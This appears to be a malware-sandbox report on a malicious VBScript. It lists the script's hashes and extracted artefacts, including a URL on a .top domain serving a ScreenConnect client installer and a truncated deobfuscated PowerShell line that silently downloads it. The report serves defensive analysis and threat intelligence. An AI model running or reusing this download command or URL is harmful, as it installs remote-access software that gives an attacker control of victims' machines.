Malicious

041dc98d117f09e98218f2e0a9cfb0a1

VBScript
|
MD5: 041dc98d117f09e98218f2e0a9cfb0a1
|
Size: 6.03 KB
|
text/vbscript

Print

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	041dc98d117f09e98218f2e0a9cfb0a1
Sha1	5119e5699c192172734ffd38925a9f2a425a4b93
Sha256	8f19d0c3444439ed0550153d6c8943ca343154706e473cd7f3458f7f82880c7d
Sha384	aa50e4f5c6eda111d49dffc1ad91bf740695334cf5aa0be9e33ed719b9a2adb49d23a09d09fc32785291c4c9e2352d79
Sha512	0aa3857fc2cdab58f3bf88313a35ed5fa5d9e8ec1a8c1dc0acff187281d4c35ffb56232a38f6d91d1c1ec3c4842cd9f1450de364ba1c8704159ae0f7427c492b
SSDeep	96:IazT41mGBg6lNBXmUjhivcVV/ic34M7p/+1aC/imi2w6/f42dD/Km/Jcy4pj:1zTWlIoV/iDYp/+p/df/goD/Km/w
TLSH	33C1300FBD0BA63069335337965B7D1DEAA1645312120C25B9DE8187DF31658F7212EB

File Structure

Artefacts

Name0	Value
URLs in VB Code - #1	https://app.buziopoasbubu.top/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest
Deobfuscated PowerShell	"$ProgressPreference = 'SilentlyContinue'; Try { Invoke-WebRequest -Uri 'https://app.buziopoasbubu.top/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile '"

041dc98d117f09e98218f2e0a9cfb0a1 (6.03 KB)

An error has occurred. This application may no longer respond until reloaded. Reload 🗙